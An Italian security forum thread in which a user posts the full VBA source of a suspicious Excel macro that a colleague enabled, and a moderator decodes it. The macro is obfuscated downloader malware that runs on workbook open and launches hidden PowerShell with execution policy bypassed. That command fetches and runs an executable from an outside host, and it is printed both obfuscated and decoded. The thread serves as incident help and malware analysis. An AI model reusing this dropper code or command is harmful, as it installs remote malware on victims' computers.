Condividi:        

macro sospetta

Come rimuovere virus e spyware? Le carte di credito sono davvero sicure in rete? È possibile navigare anonimi? Con quali programmi tutelare la propria privacy? Come proteggere i file importanti? Se volete una risposta a queste e altre domande questo è il luogo giusto!

Moderatori: m.paolo, kadosh, Luke57

macro sospetta

Postdi paolone2001 » 11/09/17 13:04

ciao, un mio collega ha scaricato un file excel, sul suo pc che è in rete, dopo averlo scansionato con l'antivirus, ma poi aprendolo credo abbia consentito l'uso delle macro.
ora, vi chiedo se avete idea di cosa combini questa macro, di cui riporto il listato qui sotto.
Devo essere preoccupato?
grazie, ciao
Paolo



Sub Workbook_Open()
If xlErrorBarTypeFixedValue > 0 Then
Shell "" + nubiss, O
End If
End Sub



Function nba()
nba = """"
End Function


Function zynodaf()
portog = Array("te" + "mp", "loc" + "alap" + "pda" + "ta", "ap" + "pd" + "ata", "EMAIL")
zynodaf = portog(capitalo(0, 0))
End Function


Private Function capitalo(ByVal FromLimit As Integer, ByVal ToLimit As Integer) As Integer

Randomize
randomNumber = Int((ToLimit - FromLimit) * Rnd) + FromLimit
capitalo = randomNumber

End Function


Function egoo()
egoo = "d /c" + nba
End Function


Function recviemo()
mutopp = Array(Timer(), Minute(Now), Minute(Now), "oP" + "r -e")
helliooo = Array(Timer(), "AS" + "S -W" + "i")
nagoyya = Array(Timer(), Day(Now), "DD" + "en ")
temzaas = Array(Timer(), Minute(Now), Timer(), Null, "uT" + "i B", Minute(Now), Timer(), Null)
citroen = Array(Timer(), "eLL " + "-N")
circuus = Array(Timer(), "owe" + "RS", Nothing, Timer())
dazzac = Array(Timer(), Nothing, Timer(), "RaC" + "t")
recviemo = "p" + circuus(1) + "h" + citroen(1) + "on" + "iN" + "Te" + dazzac(3) + "iv" + "E -N" + mutopp(3) + "xeC" + temzaas(4) + "yP" + helliooo(1) + "nD" + "O " + " hI" + nagoyya(2)
End Function

Function nubiss()
flattop = zynodaf
nubiss = "c" + "M" + egoo + recviemo + nba + "(.(\""{2}{0}{1}\"" -f'-o','bj" + "ect','new') (\""{1}{3}{5}{0}{2}{4}\"" -f't','syst','.webclie','em','nt','.ne')).('d'+'ow'+'nloadfil'+'e').Invoke('http://34tfg4th.date/fmouse.exe','%" + flattop + "%.exe');&(\""{0}{2}{1}\""-f'star','ss','t-proce') '%" + flattop + "%.exe'" + nba + nba
End Function
paolone2001
Utente Junior
 
Post: 19
Iscritto il: 05/01/08 17:54

Sponsor
 

Re: macro sospetta

Postdi Anthony47 » 12/09/17 00:05

Per chi volesse dare una mano, la macro dovrebbe aver eseguito, tramite Shell, questo comando:
Codice: Seleziona tutto
cMd /c"poweRSheLL -NoniNTeRaCtivE -NoPr -exeCuTi ByPASS -WinDO  hIDDen "(.(\"{2}{0}{1}\" -f'-o','bject','new') (\"{1}{3}{5}{0}{2}{4}\" -f't','syst','.webclie','em','nt','.ne')).('d'+'ow'+'nloadfil'+'e').Invoke('http://34tfg4th.date/fmouse.exe','%temp%.exe');&(\"{0}{2}{1}\"-f'star','ss','t-proce') '%temp%.exe'""

Ciao
Avatar utente
Anthony47
Moderatore
 
Post: 19440
Iscritto il: 21/03/06 16:03
Località: Ivrea


Torna a Sicurezza e Privacy


Topic correlati a "macro sospetta":


Chi c’è in linea

Visitano il forum: Nessuno e 6 ospiti